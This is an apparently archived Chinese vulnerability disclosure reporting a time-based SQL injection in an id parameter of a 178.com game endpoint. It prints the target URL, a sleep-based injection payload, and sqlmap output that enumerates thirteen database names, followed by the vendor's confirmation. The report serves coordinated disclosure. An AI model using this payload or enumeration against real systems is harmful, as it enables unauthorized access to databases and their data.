漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:178游戏某接口SQL注入(涉及13个数据库)
提交时间:2015-12-07 12:08
修复时间:2016-01-21 13:40
公开时间:2016-01-21 13:40
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情 披露状态:
2015-12-07: 细节已通知厂商并且等待厂商处理中 2015-12-07: 厂商已经确认,细节仅向厂商公开 2015-12-17: 细节向核心白帽子及相关领域专家公开 2015-12-27: 细节向普通白帽子公开 2016-01-06: 细节向实习白帽子公开 2016-01-21: 细节向公众公开
简要描述: 178某站SQL注入(涉及13个数据库)
详细说明: URL:http://i.178.com/?_action=getgamedata&_app=game&_controller=gamedata&id=1 参数id http://i.178.com/?_action=getgamedata&_app=game&_controller=gamedata&id=1%' and sleep(1) and '%'='
漏洞证明:
--- [10:49:49] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.2.17 back-end DBMS: MySQL 5 [10:49:49] [INFO] fetching database names [10:49:49] [INFO] fetching number of databases [10:49:49] [INFO] resumed: 13 [10:49:49] [INFO] resumed: information_schema [10:49:49] [INFO] resumed: game [10:49:49] [INFO] resumed: sns2 [10:49:49] [INFO] resuming partial value: sns_a [10:49:49] [WARNING] time-based comparison requires larger statistical model, please wait.............................. do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y [10:50:06] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors [10:50:25] [INFO] adjusting time delay to 1 second due to good response times dmin [10:53:24] [ERROR] invalid character detected. retrying.. [10:53:24] [WARNING] increasing time delay to 2 seconds [10:53:25] [INFO] retrieved: sns_album [10:59:02] [INFO] retrieved: sn [11:01:15] [ERROR] invalid character detected. retrying.. [11:01:15] [WARNING] increasing time delay to 3 seconds s_api [11:04:44] [INFO] retrieved: sns_bet [11:09:13] [INFO] retrieved: sns_b [11:13:38] [ERROR] invalid character detected. retrying.. [11:13:38] [WARNING] increasing time delay to 4 seconds log [11:15:47] [INFO] retrieved: sns_cite [11:20:45] [INFO] retrieved: sns_get_armory [11:30:04] [INFO] retrieved: sns_group [11:36:22] [INFO] retrieved: sns_gsrank [11:42:43] [INFO] retrieved: test available databases [13]: [*] game [*] information_schema [*] sns2 [*] sns_admin [*] sns_album [*] sns_api [*] sns_bet [*] sns_blog [*] sns_cite [*] sns_get_armory [*] sns_group [*] sns_gsrank [*] test
修复方案: 漏洞回应 厂商回应: 危害等级:高
漏洞Rank:15
确认时间:2015-12-07 13:38
厂商回复: 感谢洞主对完美世界的关注,我们将尽快修补。
最新状态: 暂无